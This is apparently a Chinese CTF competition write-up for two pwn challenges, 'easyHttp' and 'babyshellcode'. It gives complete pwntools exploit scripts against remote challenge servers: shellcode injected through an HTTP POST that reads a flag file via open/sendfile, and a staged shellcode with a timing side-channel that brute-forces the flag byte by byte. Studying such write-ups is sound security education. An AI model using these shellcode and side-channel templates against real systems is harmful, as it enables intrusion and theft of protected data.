能源赛 wp

发表于 |

主要是看到的shellcode的骚操作

easyHtpp

题⽬是⼀道简单http服务器,经过检查POST参数是/tryShellcode之后会执⾏shellcode,构造 body⻓度和我们shellcode⻓度相同后再绕过沙盒保护对system的限制即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
#sh = process('./easyHttp')
sh = remote('106.14.120.231',29792)
def makeHeader(shellcode):
return "POST /tryShellcode HTTP/1.0\r\nContent-Length: " + str(len(shell
def Login():
return "POST /login HTTP/1.0\r\nNAME: 1\nPass: 1\r\n\r\n"
# gdb.attach(sh,'b* $rebase(0x1F0F)')
sh.recvuntil('test> \n')
sh.sendline(Login())
sh.recvuntil('test> \n')
shellcode = asm(shellcraft.cat("flag", fd=1))
payload = makeHeader(shellcode)
sh.sendline(payload)
sh.interactive()

这个题比较有意思的就是shellcraf.cat的那个操作,没有使用read系统调用,可以说是另一种orw,从汇编里可以看到采用了sendfile这个系统调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
>>> print shellcraft.cat("flag")
    /* push 'flag\x00' */
    push 1
    dec byte ptr [esp]
    push 0x67616c66
    /* open(file='esp', oflag='O_RDONLY', mode=0) */
    mov ebx, esp
    xor ecx, ecx
    xor edx, edx
    /* call open() */
    push SYS_open /* 5 */
    pop eax
    int 0x80
    /* sendfile(out_fd=1, in_fd='eax', offset=0, count=0x7fffffff) */
    push 1
    pop ebx
    mov ecx, eax
    xor edx, edx
    push 0x7fffffff
    pop esi
    /* call sendfile() */
    xor eax, eax
    mov al, 0xbb
    int 0x80

babyshellcode

基本同2020年天翼杯safebox原题,2021年蓝帽杯线下原题,找到⽹上wp修改⼀些关键部分地 址,采⽤侧信道⽅式爆破flag即可。网上模版还是用的不顺手,还是记一下自己的模板吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
from pwn import *
 
EXCV = context.binary = './chall'
e = ELF(EXCV)

context.arch = 'amd64'
context.os = 'linux'
 
if args.I:
    context.log_level = 'debug'
 
def pwn(p, index, ch):
    shellcode = '''
    xor rdi, rdi;
    push 0x10100;
    pop rsi;
    push 0x100;
    pop rdx;
    syscall;
    jmp rsi;
    '''

    p.recvuntil('Are you a shellcode master?\n')
    p.send(asm(shellcode).ljust(0x18,b'a'))
    
    # open
    shellcode = "mov rax, 0x67616c662f2e; push rax; mov rdi,rsp;"
    shellcode += "xor esi, esi; xor rdx, rdx;"
    shellcode += "push 2; pop rax; syscall;"
    # shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"
 
    # re open, rax => 4
    shellcode += "push 2; pop rax; syscall;"
 
    # read(rax, 0x10040, 0x50)
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    
    # cmp and jz
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)
 
    shellcode = asm(shellcode)
 
    p.send(shellcode.ljust(0x100-14, b'a') + b'/home/pwn/flag')
 
index = 0
ans = []
while True:
    for ch in range(0x20, 127):
        if args.R:
            p = remote('106.14.120.231',28444)
        else:
            p = process(EXCV)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            pass
        end = time.time()
        p.close()
        if end-start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1



print("".join([chr(i) for i in ans]))

# p = process(EXCV)
# gdb.attach(p)
# pwn(p,0, 0x20)
-------------本文结束感谢您的阅读-------------
+ +